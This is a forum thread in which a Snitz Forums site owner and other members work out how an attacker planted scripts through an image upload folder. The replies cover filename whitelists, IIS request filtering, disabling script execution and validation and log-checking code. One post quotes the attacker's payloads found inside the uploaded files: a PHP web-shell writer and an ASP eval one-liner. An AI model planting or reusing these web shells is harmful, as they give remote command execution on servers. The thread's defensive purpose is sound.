spreadpoems
New Member
52 Posts
Posted - 14 January 2014 : 17:37:21

I have a directory where my registered users can upload images with .gif, .jpg and .png extensions on my forum. I'm using proeder's file attachment mod.
A hacker has been accessing my web server by uploading .gif and .jpg files to my user upload directory, which is set up so that anyone has write permission.
I think he then changes the files to .asp and, well, it goes downhill from there...
My forum version is Snitz Forums 2000 v3.4.06 with a few of the security related features from .07 added. (Where is that list posted of the features updated in the newest version, by the way?)
Is there a patch that I missed? This must have happened to someone before; any advice? I need to be able to check that the file is in fact an image before allowing the file to be uploaded.
It seems I'm suffering something similar to this: http://forum.snitz.com/Forum/topic.asp?TOPIC_ID=70002
Thanks

Carefree
Advanced Member
Philippines
4217 Posts
Posted - 14 January 2014 : 19:53:58

I have my upload script checking the file names for a number of characters before allowing uploads. That precludes probably 99% of the silly behavior. Although, to retain complete control, it would probably be best to specify ALLOWED characters, rather than trying to guess all the possibilities which will enable hacking.
Currently, I use this:
' Blacklist: strip characters that are not allowed in an uploaded file name
filename = Replace(filename, vbNullChar, "")
filename = Replace(filename, "!", "")
filename = Replace(filename, "#", "")
filename = Replace(filename, "@", "")
filename = Replace(filename, "$", "")
filename = Replace(filename, "%", "")
filename = Replace(filename, "^", "")
filename = Replace(filename, "&", "")
filename = Replace(filename, "*", "")
filename = Replace(filename, "(", "")
filename = Replace(filename, ")", "")
filename = Replace(filename, "=", "")
filename = Replace(filename, "+", "")
filename = Replace(filename, "}", "")
filename = Replace(filename, "[", "")
filename = Replace(filename, "]", "")
filename = Replace(filename, "{", "")
filename = Replace(filename, "|", "")
filename = Replace(filename, "\", "")
filename = Replace(filename, ";", "")
filename = Replace(filename, ":", "")
filename = Replace(filename, "/", "")
filename = Replace(filename, "?", "")
filename = Replace(filename, ">", "")
filename = Replace(filename, ",", "")
filename = Replace(filename, "<", "")
filename = Replace(filename, "'", "")
filename = Replace(filename, "~", "")
filename = Replace(filename, " ", "")
filename = Replace(filename, Chr(160), "")   ' non-breaking space
May change it to something like this:
' Whitelist: reject the upload if any character is outside a-z, 0-9, "-" or "_"
' ("." is not in the list, so the extension has to be handled separately).
' InStr needs all four arguments when a compare mode is given; with three, the first is the start position.
For i = 1 To Len(filename)
    If InStr(1, "abcdefghijklmnopqrstuvwxyz0123456789-_", LCase(Mid(filename, i, 1)), vbBinaryCompare) = 0 Then
        Go_Result "Can not upload this file. File name not allowed."
        Exit For
    End If
Next

Edited by - Carefree on 14 January 2014 20:17:53

Carefree
Advanced Member
Philippines
4217 Posts
Posted - 15 January 2014 : 05:11:49

I have that set, also.

spreadpoems
New Member
52 Posts
Posted - 15 January 2014 : 07:35:02

Guys, thank you very much for your help.
I'm going to check the log files again to see what trick he was using to get those .asp files uploaded as .jpg's. I don't recall seeing any extra dots or semicolons, but maybe I missed something, or maybe he's using another trick.
I'll also check the permissions on the folder. I know I had to turn on Write permissions to allow images to be uploaded. If I recall, one of the permissions is Read and Execute. I will need to research how to turn off scripts/executables.
One thing I did do which seemed to temporarily frustrate him: using IIS Request Filtering, I set the directory to only allow requests for image extensions; however, that didn't stop these files from being placed on the server. I'll get back to you later in the day with what I find. Thanks.

spreadpoems
New Member
52 Posts
Posted - 15 January 2014 : 15:43:11

OK, I removed the Script permission. For those who don't know how in IIS7, here are instructions: http://serverfault.com/questions/69920/where-is-the-execute-permissions-function-in-iis7
My web.config in the directory where uploads are allowed now looks like this:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <staticContent>
      <clientCache cacheControlMode="UseMaxAge" cacheControlMaxAge="365.00:00:00" />
    </staticContent>
    <security>
      <requestFiltering>
        <fileExtensions allowUnlisted="false">
          <add fileExtension=".jpeg" allowed="true" />
          <add fileExtension=".jpg" allowed="true" />
          <add fileExtension=".gif" allowed="true" />
          <add fileExtension=".png" allowed="true" />
        </fileExtensions>
        <requestLimits maxQueryString="0" />
      </requestFiltering>
    </security>
    <handlers accessPolicy="Read" />
  </system.webServer>
</configuration>
Now, working on blocking the files from being uploaded in the first place. First I need to figure out how the hacker did it.

Edited by - spreadpoems on 15 January 2014 15:56:16

spreadpoems
New Member
52 Posts
Posted - 15 January 2014 : 15:55:38

This is what my IsValidString function in outputFile.asp looks like. I don't know why the section checking for double spaces is commented out, but I have no reason to believe that's what the hacker used to get in.
Function IsValidString(sValidate)
    Dim sInvalidChars
    Dim bTemp
    Dim i
    ' Disallowed characters (blacklist)
    sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<'@"
    For i = 1 To Len(sInvalidChars)
        If InStr(sValidate, Mid(sInvalidChars, i, 1)) > 0 Then bTemp = True
        If bTemp Then Exit For
    Next
    ' Non-breaking space (Chr(160)) is also rejected
    For i = 1 To Len(sValidate)
        If Asc(Mid(sValidate, i, 1)) = 160 Then bTemp = True
        If bTemp Then Exit For
    Next
    ' extra checks
    ' no two consecutive dots or spaces
    If Not bTemp Then
        bTemp = InStr(sValidate, "..") > 0
    End If
    '### begin smoutc's fix (the double-space check is currently commented out)
    ' If Not bTemp Then
    '     bTemp = InStr(sValidate, "  ") > 0
    ' End If
    '### end smoutc's fix
    ' Addition for leading and trailing spaces
    If Not bTemp Then
        bTemp = (Len(sValidate) <> Len(Trim(sValidate)))
    End If
    ' if any of the above are true, invalid string
    IsValidString = Not bTemp
End Function
Carefree, is your code supposed to replace this entire function?
' Whitelist check; InStr needs all four arguments when a compare mode is given
For i = 1 To Len(filename)
    If InStr(1, "abcdefghijklmnopqrstuvwxyz0123456789-_", LCase(Mid(filename, i, 1)), vbBinaryCompare) = 0 Then
        Go_Result "Can not upload this file. File name not allowed."
        Exit For
    End If
Next
Also, what is stopping someone from changing the extension of a .asp file to .jpg and then uploading it?
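Pulling the two questions above together (Carefree's whitelist, and what stops a renamed .asp): an added Python example, not code from the thread or from the attachment mod, that checks the name against a whitelist with exactly one allowed extension and then checks the body against the magic bytes of that image type. The length limit, the script-marker scan and the sample inputs are my own assumptions; it is a reference to port into outputFile.asp, not a drop-in.

```python
import re

# Extension allowlist (the four types from the thread's web.config) and the magic bytes
# a file of each type must start with. Sample inputs used with this code are constructed.
ALLOWED_EXT = {".jpg", ".jpeg", ".gif", ".png"}
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
}
# Carefree's whitelist applied to the base name: only a-z, 0-9, "-" and "_" (length limit assumed)
BASENAME_RE = re.compile(r"^[a-z0-9_-]{1,64}$")


def check_filename(filename: str) -> bool:
    """Accept only 'name.ext' with a whitelisted base name and an allowed extension.

    Rejects the tricks mentioned in the thread: null bytes, chr(160) spaces,
    double extensions ('shell.asp.jpg'), 'shell.asp;.jpg', '..' and trailing spaces.
    """
    name = filename.lower()
    if name != name.strip() or "\x00" in name or "\xa0" in name:
        return False
    parts = name.split(".")
    if len(parts) != 2:  # exactly one dot: no double extension, no '..', no bare name
        return False
    base, ext = parts
    return bool(BASENAME_RE.match(base)) and "." + ext in ALLOWED_EXT


def check_content(filename: str, data: bytes) -> bool:
    """Require the magic bytes of the claimed type and no server-side script marker.

    The marker scan ('<?php', '<%') is a heuristic: a real image can still carry
    appended code, and those bytes can occur by chance in genuine image data, so this
    complements disabling script execution in the upload folder rather than replacing it.
    """
    ext = "." + filename.lower().rsplit(".", 1)[-1]
    if not any(data.startswith(m) for m in MAGIC.get(ext, ())):
        return False
    body = data.lower()
    return b"<?php" not in body and b"<%" not in body


def is_safe_upload(filename: str, data: bytes) -> bool:
    """Both the name and the content must pass before the file is written to the upload folder."""
    return check_filename(filename) and check_content(filename, data)
```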

Carefree
Advanced Member
Philippines
4217 Posts
Posted - 15 January 2014 : 20:14:20

This would be the function:
quote:
Also, what is stopping someone from changing the extension of a .asp file to .jpg and then uploading it?
A file uploaded as a ".jpg" won't execute as an .asp file, regardless of whether the directory allows execution. It will try to display it as an image and you'd get either a bunch of gibberish or a message saying it cannot be displayed because it contains errors.

spreadpoems
New Member
52 Posts
Posted - 16 January 2014 : 00:56:16

I'm still in the middle of this, but I just wanted to post this interesting find, thanks to this post: http://stackoverflow.com/questions/3499173/my-php-site-was-hacked-by-codes-uploaded-as-image
If I open the .gif uploaded by the hacker with Notepad, there is text inside. Lots of gibberish, and it ends with:
<?PHP fputs(fopen(’shell.php’,'w’),’<?php eval($_POST[cmd])?>’);?>
The .jpg ends with this:
<%eval request("MH")%>
What should I be looking for in the log files? A request for a querystring "MH"?
quote: A file uploaded as a ".jpg" won't execute as an .asp file, regardless of whether the directory allows execution. It will try to display it as an image and you'd get either a bunch of gibberish or a message saying it cannot be displayed because it contains errors.
If this is possible then there really is no way to prevent these files from being uploaded. The only recourse is to prevent them from being executed.
Edited by - spreadpoems on 16 January 2014 00:57:33
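On the question of what to look for in the log files, an added example that is not part of the thread: a small Python parser for IIS W3C log lines that flags requests a static image should never receive. The log excerpt, the client addresses and the /forum/uploads/ path are constructed assumptions.

```python
import re

# Constructed IIS W3C log excerpt (not from the thread); the #Fields line gives the column order.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2014-01-15 03:12:41 10.0.0.5 GET /forum/uploads/avatar12.jpg - 80 - 192.0.2.10 Mozilla/5.0 200 0 0 15
2014-01-15 03:13:02 10.0.0.5 POST /forum/uploads/img8821.jpg - 80 - 198.51.100.7 Mozilla/5.0 200 0 0 312
2014-01-15 03:13:09 10.0.0.5 GET /forum/uploads/img8821.jpg MH=1 80 - 198.51.100.7 Mozilla/5.0 200 0 0 288
2014-01-15 03:14:00 10.0.0.5 GET /forum/post.asp TOPIC_ID=70002 80 - 192.0.2.10 Mozilla/5.0 200 0 0 40
"""

UPLOAD_DIR = "/forum/uploads/"  # assumed URL path of the attachment folder
IMAGE_EXT = re.compile(r"\.(jpe?g|gif|png)$", re.IGNORECASE)


def parse_w3c(text: str):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))


def suspicious_requests(text: str):
    """Return (reason, c-ip, uri, query) for requests a static image should never receive.

    A genuine image is only ever fetched with GET/HEAD and takes no parameters, so a
    POST to it, or a query string on it (such as the "MH" parameter the thread's .jpg
    reads), points at the file being executed as script rather than served as an image.
    """
    hits = []
    for r in parse_w3c(text):
        uri, query = r["cs-uri-stem"], r["cs-uri-query"]
        if not uri.startswith(UPLOAD_DIR):
            continue
        if r["cs-method"] not in ("GET", "HEAD"):
            hits.append(("non-GET request to upload", r["c-ip"], uri, query))
        elif IMAGE_EXT.search(uri) and query != "-":
            hits.append(("query string sent to image", r["c-ip"], uri, query))
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(*hit)
```

With maxQueryString="0" set in the folder's web.config, the query-string case is already refused by IIS, so the POST case is the one to keep watching for.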

HuwR
Forum Admin
United Kingdom
20595 Posts
Posted - 16 January 2014 : 07:50:38

quote: If this is possible then there really is no way to prevent these files from being uploaded. The only recourse is to prevent them from being executed.
Correct, which is why you should disable script execution in your image/upload folders; in fact, any folder which you allow users to upload to should have script execution disabled.

MVC .net dev/test site | MVC .net running on Raspberry Pi